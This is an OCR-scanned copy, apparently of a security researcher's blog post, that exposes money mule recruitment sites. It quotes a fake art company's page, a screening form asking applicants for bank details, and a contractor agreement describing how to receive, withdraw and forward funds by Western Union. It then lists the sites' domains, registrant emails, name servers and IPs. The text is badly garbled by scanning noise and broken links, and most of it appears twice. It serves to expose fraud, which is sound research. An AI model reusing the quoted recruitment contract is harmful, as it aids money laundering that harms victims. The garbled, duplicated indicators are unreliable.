ipicksadascesasasstdasécsesaiescbeseceadasssacdaccatnesiodcoedsbatahe vshasesccesesatcacbesens 


™ | am student willing to get a part-time job. 
© |amnota resident of the AU and currently | am looking for a part-time job. 


cose | 


Pre-employment test made by © 2010 Psychtests AIM Inc. All Rights Reserved 


From financial services to an entirely new market segment, whereas the entire recruitment 
process remains pretty static, excluding several time quality assurance oriented details. For 
instance, every potential mule is required to download a entry level job psychological test, 
which surprisingly asks directly whether the mule is from Australia, next to automatically 
choosing Australia as a country of origin at a later stage throughout the registration process. 


Moreover, in the context of quality assurance, the recruiters also ask the applicant "Are 
you/were you convicted?" in an attempt to combine the survey results with other details such 
the opening date of the bank account, as well as the average daily/weekly/monthly amount 
transferred. 


- The Terms of Service 
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Account Type*: Business/Corporate V 
Bank Name* 


Account Type (checking/saving)*: | checking ¥ 


Name on the Account* 2 
Account Number 2 
BSB number* 2 
Date you opened your bank 
account* ? 
How often do you use your bank 
account?* ? 
Average amount of each 
operation* 
Is ita prepaid account?” 2 
Daily withdrawal limit over the 
counter* ? 
Have you ever used Western 
Union/Money Gram?* 
Are there Money Gram offices in 

Do 


your area?*: 


Next Step 


"DUTIES: 

The Contractor undertakes the responsibility to receive payments from the Clients of the 
Company to his personal bank account, withdraw cash and to process payments to the 
Company’s partners by Western Union or MoneyGram money transfer system within one (1) 
day. He/she will report directly to the senior manager and to any other party designated by 
the senior manager in connection with the performance of the duties under this Agreement 
and shall fulfill any other duties reasonably requested by the Company and agreed to by the 
Contractor. 


CONFIDENTIALITY: 

The Contractor acknowledges that during the engagement he will have access to and be- 
come acquainted with various trade secrets, inventions, innovations, processes, information, 
records and specifications owned or licensed by the Company and/or used by the Company 
in connection with the operation of its business including, without limitation, the Company’s 
business and product processes, methods, customer lists, accounts and procedures. 


The Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, 
or use any of them in any manner, either during the term of this Agreement or at any time 
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thereafter. All files, records, documents, blueprints, specifications, information, letters, notes, 
media lists, original artwork/creative, notebooks, and similar items relating to the business of 
the Company, whether prepared by the Contractor or otherwise coming into his possession, 
shall remain the exclusive property of the Company. 


The Contractor shall not retain any copies of the foregoing without the Company’s prior 
written permission. The Contractor further agrees that he will not disclose his retention as 
an independent contractor or the terms of this Agreement to any person without the prior 
written consent of the Company and shall at all times preserve the confidential nature of his 
relationship to the Company and of the services hereunder. 


If the Contractor releases any of the above information to any parties outside of this 
company, such as personal friend, close relatives or other Financial Institutions such as a Bank 
or other Financial Firms, such could be considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be released and when, the Contractor will 
contact their superior right away. 


TERMS OF ENGAGEMENT: 

The Contractor is engaged by the Company on terms of thirty-days (30) probationary period. 
During the probationary period the Company undertakes to pay to the Contractor 
the base salary amounting to AUD 2300 per month plus 8 % commission from 
each payment processing operation. After the probationary period the Company 
agrees to revise and raise the base salary to 3000 USD. The Company has the right 
to cancel this Agreement at any time within the probationary period or refuse to extend it 
after that, should the Contractor refuse to fulfill his/her obligations under this Agreement or 
fulfills them not in good faith.The Contractor has the right to terminate the Agreement at any 
time on condition that he/she has processed all previous payments and has no new instructions. 


COMPENSATION: 

The Company undertakes to pay taxes accrued in connection with money transfer.The 
Company shall also reimburse part of expenses which are incurred in connection with money 
transfer by Western Union or MoneyGram systems (should money transfer charges exceed 3 
%, i.e. Commission for payment processing operation).The above difference will be automat- 
ically added to the base salary of the Contractor and paid once per month together with the 
base salary. 


The Company shall have the right to decrease the Contractor’s commission in case the 
payment processing terms were violated by the Contractor. Should the Contractor delays 
re-sending money accepted to his bank account for the period exceeding one (1) day without 
any explicit reason, the Company shall have the right to impose sanctions on the Contractor 
if only the delay has not been caused by the Force Majeur circumstances and to apply to 
the arbitration and claim for the reimburse of the amount transferred to his account or for 
compensation for other damage if any, evicted due to the delay. 


The Contractor may take days off at any time and at his/her option upon giving five (5) 
working days advance notice in writing or three (3) working days advance notice via e-mail or 
fax to the Company in order that the latter may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted from the Contractor’s base salary." 


- OSINT data for money mule recruitment sites 
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The following portfolio of money mule recruitment domains appears to have been registered 
using automated email registration tools, with the potential for [3]CAPTCHA outsourcing 
clearly considered by the malicious parties, taking into consideration the even decreasing 
price for solving CAPTCHA challenges. 


4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 
ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 
ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 
AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: aryan@ppmail.ru 
AMINA-GROUPCO.CO - Email: beige@ca4.ru 
AMINA-GROUPINC.CC - Email: zowie@yourisp.ru 
AMINAORG.CC - Email: range@ppmail.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC.CO - Email: ira@bz3.ru 
AUS-FINANCE.CC - Email: ours@ca4.ru 
BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 
CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: flip@free-id.ru 
CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: liszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP.CO - Email: twig@ppmail.ru 
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru 
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 
FINTEC-LTD.CC - Email: w@yourisp.ru 
FINTEC-UK.CO - Email: sons@bz3.ru 
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GLEICHFALLS-GROUPINC.CO - Email: tents@ppmail.ru 
I-COMPASS-GROUP.CO - Email: wolf@ca4.ru 
IM-SYSGROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 
INCOGROUP-USA.CO - Email: beams@free-id.ru 
JOURNEY-FINANCIAL.CC - Email: lulu@ca4.ru 
LBMGROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-GROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 
LCD-FINANCE.CC - Email: fritz@bz3.ru 
MACROTECHINC.CC - Email: cv@yourisp.ru 
MACROTECH-UK.CO - Email: curl@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 
MALLOW-GROUPINC.CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru 
ONLINE-SOLUTIONSLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.cc - Email: prim@bz3.ru 
PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.CC - Email: spy@yourisp.ru 
RADIUMUK-LTD.CC - Email: socks@cheapbox.ru 
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.CC - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.cc - Email: 0o0ozed@bz3.ru 
SILVERSUNGROUP-INC.CC - Email: cp@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
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SOLUTIONSLTD.CC - Email: h20@ca4.ru 
STILE-GROUPLLC.CC - Email: ma@free-id.ru 
SUNRISEPR-GROUPLTD.CC - Email: cough@ppmail.ru 
TECHADVINC.CC - Email: chance@cheapbox.ru 
TECHADV-INC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 
USGROUP-REIGN.CO - Email: w@ppmail.ru 
YESGROUP-LLC.CO - Email: twig@ppmail.ru 


Name servers of notice: 

NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: ached@yourisp.ru 
NS1.NNSQUE.CC - Email: amok@cheapbox.ru 

NS1.OLIVAU.CC - Email: bop@cheapbox.ru 

NS1.PAGEREDNS.CC - 178.162.152.77 (AS28753) - Email: freer@free-id.ru 
NS1.SURPLUSUSA.CC - 209.159.156.162 (AS19318) - Email: skulk@ppmail.ru 
NS1.TVSILVAU.CC - Email: fact@ppmail.ru 

NS1.UKNSSPACE.CC - 69.10.44.190 (AS19318) - Email: gravy@ca4.ru 
nsl.uksource.cc - 69.10.44.189 (AS19318) - Email: liver@cheapbox.ru 
NS1.USABONDS.CC - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: bold@yourisp.ru 
NS2.COUKSNS.CC - 122.70.148.179 (AS55462) - Email: preen@ppmail.ru 
ns2.gbtrade.cc - 66.199.236.114 (AS15149) - Email: ct@yourisp.ru 
NS2.OLIVAU.CC - Email: bopo@cheapbox.ru 

NS2.RINGTONS.CC - 66.199.236.115 (AS15149) - Email: aaron@cheapbox.ru 
NS2.TVSILVAU.CC - Email: fact@ppmail.ru 

NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: tile@yourisp.ru 
NS2.ZONENSUK.CC - 178.162.181.11 (AS28753) - Email: rooms@ppmail.ru 
NS3.AUSTDEC.CC - 178.162.181.11 (AS28753) - Email: bold@yourisp.ru 
NS3.FOLOWDNS.CC - 178.162.181.11 (AS28753) - Email: dyed@bz3.ru 
NS3.SDNSAU.CC - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: skulk@ppmail.ru 
NS3.TVSILVAU.CC - Email: fact@ppmail.ru 

NS3.UKCCONS.CC - 178.162.181.11 (AS28753) - Email: ted@cheapbox.ru 
NS3.UKDNS.CC - 66.199.236.116 (AS15149) - Email: append@free-id.ru 
ns3.ukearnings.cc - 178.162.181.11 (AS28753) - Email: bf@free-id.ru 


ASs of notice using standart ns1;ns2; ns3 structure: 
AS28753 - NETDIRECT AS NETDIRECT Frankfurt, DE 


AS19318 - NJIIX-1 NJIIX.net 110B Meadowlands Pkwy Secaucus, NJ 07094 +1.201.605.1425 


AS28753 - NETDIRECT AS NETDIRECT Frankfurt, DE 
AS15149 - EZZI|-101-BGP EZZI 


- Long term trends - "from mule inventory to transactions inventory" 


With the [4]localization and standardization/template-tization of the entire money mule 
recruitment process an every day’s reality, quality assurance and diversification of the 
markets/market segments in order to increase the probability of successful social engineering 
attack, will start taking place. Moreover, the current template driven recruitment ecosystem 
will inevitably start taking advantage of basic concepts such as geolocation and content 
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cloaking, in order to once again increase the probability for converting a web site visitor into 
a mule. 


At an invite-only conference that | attended in September, 2010, someone from the au- 
dience asked me a rather interesting question. Does it really matter how many mules are 
recruited by a particular syndicate, and most importantly, can we talk about average number 
of days/weeks/hours by the time the mule gets busted, and can no longer offer his/her services? 


In the long term, we’re inevitably going to witness the migration from building invento- 
ries of mules to transaction-driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. The number of possible transactions 
with success rates based on historical performance, combined with an infinite loop of recruit- 
ment is what will drive the entire mule recruitment ecosystem. 


Related posts: 

[5]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[7]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[8]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[9]Money Mule Recruiters on Yahoo!’s Web Hosting 

[10]Dissecting an Ongoing Money Mule Recruitment Campaign 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[12]Keeping Reshipping Mule Recruiters on a Short Leash 
[13]Keeping Money Mule Recruiters on a Short Leash 
[14]Standardizing the Money Mule Recruitment Process 

[15]Inside a Money Laundering Group’s Spamming Operations 
[16]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[17]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [18]Dancho Danchev’s blog. 


. http://ddanchev. blogspot .com/2010/04/keeping-money-mule-recruiters-on-short .htm 
. http: //ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.htm 


ttp://www.zdnet.com/blog/security/inside-indias-captcha-solving-economy/183 
. http://ddanchev. blogspot . com/2009/10/standardizing-money-mule-recruitment.htm 
. http: //ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.htm 


. http: //ddanchev.blogspot .com/2010/04/keeping-money-mule-recruiters-on-short .htm 


. http://ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving.htm 
. http: //ddanchev.blogspot .com/2010/03/keeping-money-mule-recruiters-on-short .htm 


. http: //ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web. html 


10. http: //ddanchev. blogspot .com/2010/02/dissect ing-ongoing-money-mule .htm 
11. http://ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.htm 


ttp://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


13. 
14. 

. http://ddanchev. blogspot .com/2009/05/inside-money- laundering- groups- spamming. html 
16. 
17. 

18. 
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7.1.5 Keeping Money Mule Recruiters on a Short Leash - Part Five (2011-01-31 12:58) 


Home About the Company Products Articles Links Contact Us 


New Arrivals: 


Welcome to Schwartz & Brothers LLC Authorization 
Enter to partners area 
Looking to buy art? Sell art? Schwartz & Brothers LLC is the first choice for artists and buyers alike! Schwartz 
& Brothers LLC is an effective tool for the artist and emerging artist to market and promote their artin a Logins 
professional and inexp manner. Ye will market your art to the international community of art buyers Password: * | Login | 


ther you are looking to buy or sell original art, Schwartz & Brothers LLC ts the premier art site for those Re: Forgot Password? 


seeking to buy or sell original art online 


40 COMMISSIONS! Whether you are looking to buy art or sell art, our site is fully optimized to get results 


FAST! Schwartz & Brothers LLC is the future of buying and selling original art online. Artists who choose to 


sell their original art will re e maximum marketing exposure. For artists, selling your art has never 


Latest projects 


easier, faster, or more cost-effective. Ye will help you sell your original art DIRECTLY to buyers worldwide 


with NO COMMISSIONS. Those wishing to buy art online are invited to browse our extensive online galleries © Leontd and Rimma Brallowsky (Russian) 


With money mule recruitment continuing to represent the most actively used risk-forwarding 
tactic within the cybercrime ecosystem for the purpose of securely distribution fraudulently 
obtained funds, part five of the "[1]Keeping Money Mule Recruiters on a Short Leash" series 
are here to stay. 


What’s particularly interesting about the money mule recruitment domain portfolio that 
I’ll expose, is the logical progression from bogus companies offering financial services, to a 
diverse set of companies occupying multiple markets/covering different market segments. 


- Current trends - Localization and standardization/template-tization 


A great example of this trend - largely driven by the [2]standardization and template-zation of 
money mule recruitment sites as a service- is Schwartz & Brothers LLC (schwartz-brothers.cc). 


"Schwartz & Brothers LLC is the first choice for artists and buyers alike! Schwartz & 
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Brothers LLC is an effective tool for the artist and emerging artist to market and promote their 
art in a professional and inexpensive manner. We will market your art to the international 
community of art buyers. Whether you are looking to buy or sell original art, Schwartz & 
Brothers LLC is the premier art site for those seeking to buy or sell original art online." 


Time start 16:40:28 Time elapsed: 00:04:51 


Are you an Australian citizen? 


Answer choices 


pivdscssecssovaseceoesceosaveceoesveceesouseeseasccesvaveceoeaescastaveseseaccedevabeoesences 


Sesencnensencnesseneseeseneensncnansencnensenuscnecnenacseneneccenenensenencnesnensccencnsee? 


© | am student willing to get a part-time job. 
© |amnota resident of the AU and currently | am looking for a part-time job. 


cose 


Pre-employment test made by © 2010 Psychtests AIM Inc. All Rights Reserved 


From financial services to an entirely new market segment, whereas the entire recruit- 
ment process remains pretty static, excluding several time quality assurance oriented details. 
For instance, every potential mule is required to download a entry level job psychological 
test, which surprisingly asks directly whether the mule is from Australia, next to automatically 
choosing Australia as a country of origin at a later stage throughout the registration process. 


Moreover, in the context of quality assurance, the recruiters also ask the applicant "Are 
you/were you convicted?" in an attempt to combine the survey results with other details such 
the opening date of the bank account, as well as the average daily/weekly/monthly amount 
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transferred. 


- The Terms of Service 


Account Type*: | Business/Corporate | 


Bank Name*: | 


Account Type (checking/saving)*: | checking ¥| 


Name on the Account* | 2 

Account Number |? 

BSB number |? 

Date you opened your bank 

ip ae |? 

account*: f 

How often do you use your bank 

ipa aeeieee | 9 

account? f 

Average amount of each 

operation* 

Is ita prepaid account?*: 2 

Daily withdrawal limit over the 7 

counter*: |? 

Have you ever used Western 

Union/Money Gram?* 

Are there Money Gram offices in 7 
ie 


your area?*: = 


Back Next Step 


"DUTIES: 


The Contractor undertakes the responsibility to receive payments from the Clients of 
the Company to his personal bank account, withdraw cash and to process payments to the 
Company’s partners by Western Union or MoneyGram money transfer system within one (1) 
day. He/she will report directly to the senior manager and to any other party designated by 
the senior manager in connection with the performance of the duties under this Agreement 
and shall fulfill any other duties reasonably requested by the Company and agreed to by the 
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Contractor. 


CONFIDENTIALITY: 


The Contractor acknowledges that during the engagement he will have access to and 
become acquainted with various trade secrets, inventions, innovations, processes, infor- 
mation, records and specifications owned or licensed by the Company and/or used by the 
Company in connection with the operation of its business including, without limitation, the 
Company’s business and product processes, methods, customer lists, accounts and proce- 
dures. 


The Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, 
or use any of them in any manner, either during the term of this Agreement or at any time 
thereafter. All files, records, documents, blueprints, specifications, information, letters, notes, 
media lists, original artwork/creative, notebooks, and similar items relating to the business of 
the Company, whether prepared by the Contractor or otherwise coming into his possession, 
shall remain the exclusive property of the Company. 


The Contractor shall not retain any copies of the foregoing without the Company’s prior 
written permission. The Contractor further agrees that he will not disclose his retention as 
an independent contractor or the terms of this Agreement to any person without the prior 
written consent of the Company and shall at all times preserve the confidential nature of his 
relationship to the Company and of the services hereunder. 


If the Contractor releases any of the above information to any parties outside of this 
company, such as personal friend, close relatives or other Financial Institutions such as a Bank 
or other Financial Firms, such could be considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be released and when, the Contractor will 
contact their superior right away. 


TERMS OF ENGAGEMENT: 


The Contractor is engaged by the Company on terms of thirty-days (30) probationary 
period. During the probationary period the Company undertakes to pay to the Con- 
tractor the base salary amounting to AUD 2300 per month plus 8 % commission from 
each payment processing operation. After the probationary period the Company 
agrees to revise and raise the base salary to 3000 USD. The Company has the right to 
cancel this Agreement at any time within the probationary period or refuse to extend it after 
that, should the Contractor refuse to fulfill his/her obligations under this Agreement or fulfills 
them not in good faith.The Contractor has the right to terminate the Agreement at any time 
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on condition that he/she has processed all previous payments and has no new instructions. 


COMPENSATION: 


The Company undertakes to pay taxes accrued in connection with money transfer.The 
Company shall also reimburse part of expenses which are incurred in connection with money 
transfer by Western Union or MoneyGram systems (should money transfer charges exceed 3 
%, i.e. Commission for payment processing operation).The above difference will be automat- 
ically added to the base salary of the Contractor and paid once per month together with the 
base salary. 


The Company shall have the right to decrease the Contractor’s commission in case the 
payment processing terms were violated by the Contractor. Should the Contractor delays 
re-sending money accepted to his bank account for the period exceeding one (1) day without 
any explicit reason, the Company shall have the right to impose sanctions on the Contractor 
if only the delay has not been caused by the Force Majeur circumstances and to apply to 
the arbitration and claim for the reimburse of the amount transferred to his account or for 
compensation for other damage if any, evicted due to the delay. 


The Contractor may take days off at any time and at his/her option upon giving five (5) 
working days advance notice in writing or three (3) working days advance notice via e-mail or 
fax to the Company in order that the latter may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted from the Contractor’s base salary." 


- OSINT data for money mule recruitment sites 
The following portfolio of money mule recruitment domains appears to have been regis- 
tered using automated email registration tools, with the potential for [3]CAPTCHA outsourcing 


clearly considered by the malicious parties, taking into consideration the even decreasing 
price for solving CAPTCHA challenges. 


4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 
ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 
ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 
AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: aryan@ppmail.ru 


AMINA-GROUPCO.CO - Email: beige@ca4.ru 
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AMINA-GROUPINC.CC - Email: zowie@yourisp.ru 
AMINAORG.CC - Email: range@ppmail.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC.CO - Email: ira@bz3.ru 
AUS-FINANCE,.CC - Email: ours@ca4.ru 
BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 
CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: flip@free-id.ru 
CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: liszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP.CO - Email: twig@ppmail.ru 
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru 
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 


FINTEC-LTD.CC - Email: w@yourisp.ru 
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FINTEC-UK.CO - Email: sons@bz3.ru 


LADIUMUK-LTD,CC 
HUS-FINANCE,.CC 
ALIS ANCE CC 


LADI 


SREDGAR-GROUPLLC.CC 
SREDGAR-GROUPLLC,CC 
UKTECH-GROUPLLC.CC 


GLEICHFALLS-GROUPINC.CO - Email: tents@ppmail.ru 
I-COMPASS-GROUP.CO - Email: wolf@ca4.ru 
IM-SYSGROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 
INCOGROUP-USA.CO - Email: beams@free-id.ru 
JOURNEY-FINANCIAL.CC - Email: lulu@ca4.ru 
LBMGROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-GROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 

LCD-FINANCE.CC - Email: fritz@bz3.ru 


MACROTECHINC.CC - Email: cv@yourisp.ru 
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MACROTECH-UK.CO - Email: curl@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 
MALLOW-GROUPINC,.CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru 
ONLINE-SOLUTIONSLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.cc - Email: prim@bz3.ru 
PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.CC - Email: spy@yourisp.ru 
RADIUMUK-LTD.CC - Email: socks@cheapbox.ru 
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.CC - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.cc - Email: oozed@bz3.ru 
SILVERSUNGROUP-INC.CC - Email: cpo@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
SOLUTIONSLTD.CC - Email: h20@ca4.ru 
STILE-GROUPLLC.CC - Email: ma@free-id.ru 


SUNRISEPR-GROUPLTD.CC - Email: cough@ppmail.ru 
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TECHADVINC.CC - Email: chance@cheapbox.ru 
TECHADV-INC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 
USGROUP-REIGN.CO - Email: w@ppmail.ru 


YESGROUP-LLC.CO - Email: twig@ppmail.ru 


Name servers of notice: 

NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: ached@yourisp.ru 
NS1.NNSQUE.CC - Email: amok@cheapbox.ru 

NS1.OLIVAU.CC - Email: bopo@cheapbox.ru 

NS1.PAGEREDNS.CC - 178.162.152.77 (AS28753) - Email: freer@free-id.ru 
NS1.SURPLUSUSA.CC - 209.159.156.162 (AS19318) - Email: skulk@ppmail.ru 
NS1.TVSILVAU.CC - Email: fact@ppmail.ru 

NS1.UKNSSPACE.CC - 69.10.44.190 (AS19318) - Email: gravy@ca4.ru 
nsl.uksource.cc - 69.10.44.189 (AS19318) - Email: liver@cheapbox.ru 
NS1.USABONDS.CC - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: bold@yourisp.ru 
NS2.COUKSNS.CC - 122.70.148.179 (AS55462) - Email: preen@ppmail.ru 
ns2.gbtrade.cc - 66.199.236.114 (AS15149) - Email: ct@yourisp.ru 
NS2.OLIVAU.CC - Email: bop@cheapbox.ru 

NS2.RINGTONS.CC - 66.199.236.115 (AS15149) - Email: aaron@cheapbox.ru 
NS2.TVSILVAU.CC - Email: fact@ppmail.ru 


NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: tile@yourisp.ru 
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NS2.ZONENSUK.CC - 178.162.181.11 (AS28753) - Email: rooms@ppmail.ru 
NS3.AUSTDEC.CC - 178.162.181.11 (AS28753) - Email: bold@yourisp.ru 
NS3.FOLOWDNS.CC - 178.162.181.11 (AS28753) - Email: dyed@bz3.ru 
NS3.SDNSAU.CC - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: skulk@ppmail.ru 
NS3.TVSILVAU.CC - Email: fact@ppmail.ru 

NS3.UKCCONS.CC - 178.162.181.11 (AS28753) - Email: ted@cheapbox.ru 
NS3.UKDNS.CC - 66.199.236.116 (AS15149) - Email: append@free-id.ru 


ns3.ukearnings.cc - 178.162.181.11 (AS28753) - Email: bf@free-id.ru 


ASs of notice using standart ns1;ns2; ns3 structure: 
AS28753 - NETDIRECT AS NETDIRECT Frankfurt, DE 
AS19318 - NJIIX-1 NJjIIX.net 110B Meadowlands Pkwy Secaucus, NJ 07094 +1.201.605.1425 
AS28753 - NETDIRECT AS NETDIRECT Frankfurt, DE 


AS15149 - EZZI-101-BGP EZZ| 


- Long term trends - "from mule inventory to transactions inventory" 


With the [4]localization and standardization/template-tization of the entire money mule 
recruitment process an every day’s reality, quality assurance and diversification of the 
markets/market segments in order to increase the probability of successful social engineering 
attack, will start taking place. Moreover, the current template driven recruitment ecosystem 
will inevitably start taking advantage of basic concepts such as geolocation and content 
cloaking, in order to once again increase the probability for converting a web site visitor into 
a mule. 


At an invite-only conference that | attended in September, 2010, someone from the au- 
dience asked me a rather interesting question. Does it really matter how many mules are 
recruited by a particular syndicate, and most importantly, can we talk about average number 
of days/weeks/hours by the time the mule gets busted, and can no longer offer his/her 
services? 
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In the long term, we’re inevitably going to witness the migration from building invento- 
ries of mules to transaction-driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. The number of possible transactions 
with success rates based on historical performance, combined with an infinite loop of recruit- 
ment is what will drive the entire mule recruitment ecosystem. 


Related posts: 

[5]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[7]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[8]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[9]Money Mule Recruiters on Yahoo!’s Web Hosting 

[10]Dissecting an Ongoing Money Mule Recruitment Campaign 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[12]Keeping Reshipping Mule Recruiters on a Short Leash 
[13]Keeping Money Mule Recruiters on a Short Leash 
[14]Standardizing the Money Mule Recruitment Process 

[15]Inside a Money Laundering Group’s Spamming Operations 
[16]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


[17]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [18]Dancho Danchev’s blog. 


1 fictp/édanchev ‘blogepot con/2010/04/coping-noney-mile-recruiters-on-shor¥ hall 
bee 7 aencasr Slerecst coa/200e(i0/seescuctiziag neue, erie recrsreue eal 
3. http://www. zdnet .com/blog/security/inside-indias-captcha-solving-economy/183 

4: Reeg://sauscuay etcgesce cia) 9000/0 /stanuarafeiae sce; aie rocccieeset need 
5, http: / /adancnev. blogspot. con/2010/04/dns-infrastructure-of-noney-mile.htal 
6. 
7. 
8. 


ttp://ddanchev. blogspot .com/2010/04/keeping-money-mule-recruiters-on-short.htm 
